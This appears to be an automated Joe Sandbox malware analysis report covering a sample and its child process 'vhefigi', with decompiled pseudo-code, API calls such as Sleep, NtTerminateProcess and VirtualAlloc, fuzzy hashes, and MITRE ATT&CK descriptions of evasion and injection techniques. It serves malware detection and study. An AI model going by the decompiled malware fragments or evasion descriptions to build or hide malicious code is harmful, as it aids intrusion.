Instruction Fuzzy Hash: 17D0ECB290020896C704F6E1CC46ADF7378AF14318F14513AB002B10D1DB7C9648CB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: file.exePID: 1720, Parent PID: 5856COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	63.2%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

0x0040180c
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401822
0x00401822
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401826
0x00401826
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401834
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vhefigiPID: 4520, Parent PID: 1100COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	37.5%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008CC0D2 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008CC0FA
Module32First.KERNEL32(00000000,00000224), ref: 008CC11A

Memory Dump Source

Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c5d918953e82edebfdbd6a4634032c710f9a29f727dc587f0c8e00dab3eabb4c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0EF0CD32600710ABE7202AF9A88DF6A72FCFF48360F14012DE68AD10C0DB74E8458A61

Uniqueness

Uniqueness Score: -1.00%

Function 008CBD91 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008CBDE2

Memory Dump Source

Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 0badc40e573ae91801e478e96a3c808ec1b7498ae0268a33fea79e2f83a2bd24
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E99BBF5EF08750F158094FA489B362D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008CB9AF Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b563d361f9ffd9e8f56163311aac4d2fc26e4ca69a7474ae4d743e0675f237f7
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 66117C72340504AFDB54DE59DC82FA677EAFB88320B298069EA04CB312E775EC02C760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vhefigiPID: 4556, Parent PID: 4520COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
